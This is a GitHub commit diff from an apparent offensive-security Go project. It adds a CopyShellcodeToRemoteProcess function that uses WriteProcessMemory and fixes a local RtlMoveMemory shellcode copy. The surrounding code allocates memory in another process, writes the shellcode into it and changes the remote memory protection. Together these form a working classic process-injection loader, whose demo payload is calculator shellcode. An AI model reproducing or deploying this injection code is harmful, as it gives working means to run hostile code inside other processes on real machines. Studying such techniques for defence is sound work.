Skip to content

Commit 3bcc920

Browse files
MasoudAbdaalMasoudAbdaal
committed
Added CopyShellcodeToRemoteProcess()
1 parent d93e531 commit 3bcc920

File tree

2 files changed

+31
-10
lines changed

2 files changed

+31
-10
lines changed

Shellcode/calculator.go

Lines changed: 6 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@ func ExecuteCalculator() {
1616

1717
shellAddr, shellSrc := AllocateShellcode()
1818

19-
CopyShellcodeToMemory(shellAddr, &shellSrc)
19+
CopyShellcodeToMemory(shellAddr, shellSrc)
2020

2121
ChangeShellcodeMemoryToRX(&shellAddr, len(shellSrc))
2222

@@ -46,17 +46,14 @@ func AllocateShellcode() (uintptr, []byte) {
4646
return shellAddr, shellCodeSrc
4747
}
4848

49-
func CopyShellcodeToMemory(destAddr uintptr, shellCodeSrc *[]byte) {
50-
49+
func CopyShellcodeToMemory(destAddr uintptr, shellCodeSrc []byte) {
50+
//RtlMoveMemory is for local process memory (not cross-process).
5151
procRtlMoveMemory := dll.NtDll.NewProc("RtlMoveMemory")
5252

5353
procRtlMoveMemory.Call(
54-
55-
uintptr(unsafe.Pointer(&destAddr)),
56-
// 1. Dereference Before Indexing
57-
// 2. Pointer to First Element
58-
uintptr(unsafe.Pointer(&(*shellCodeSrc)[0])),
59-
uintptr(len(*shellCodeSrc)))
54+
destAddr,
55+
uintptr(unsafe.Pointer(&(shellCodeSrc)[0])),
56+
uintptr(len(shellCodeSrc)))
6057

6158
log.Printf("[+] Shellcode Wrote Done 0x[%v] \n", destAddr)
6259
}

Shellcode/injection.go

Lines changed: 25 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -35,7 +35,7 @@ func ClassicInjection() {
3535

3636
log.Printf("[INJECT] Memory Allocation Done, Address: 0x(%x)", addr)
3737

38-
CopyShellcodeToMemory(addr, &shellcode)
38+
CopyShellcodeToRemoteProcess(cmdHandle, shellcode, addr)
3939

4040
log.Printf("[INJECT] Shellcode Moved To Process Memory \n")
4141

@@ -45,6 +45,30 @@ func ClassicInjection() {
4545

4646
}
4747

48+
func CopyShellcodeToRemoteProcess(pHandle syscall.Handle, shellCode []byte, addr uintptr) {
49+
procWriteProcessMemory := dll.Kernel32.NewProc("WriteProcessMemory")
50+
51+
var bytesWritten uintptr
52+
53+
ret, _, lastErr := procWriteProcessMemory.Call(
54+
uintptr(pHandle),
55+
addr,
56+
uintptr(unsafe.Pointer(&shellCode[0])),
57+
uintptr(len(shellCode)),
58+
uintptr(unsafe.Pointer(&bytesWritten)),
59+
)
60+
if ret == 0 {
61+
log.Panicf("[INJECT] WriteProcessMemory() failed: %v", lastErr)
62+
}
63+
64+
if bytesWritten != uintptr(len(shellCode)) {
65+
log.Panicf("[INJECT] Wrote %d/%d bytes", bytesWritten, len(shellCode))
66+
}
67+
68+
log.Printf("[INJECT] Shellcode written to 0x%x \n", shellCode)
69+
70+
}
71+
4872
func ChangeRemoteProcessPermission(pHandle windows.Handle, addr uintptr, size int, newProtect uint32) {
4973
var oldProted uint32
5074

0 commit comments

Comments
 (0)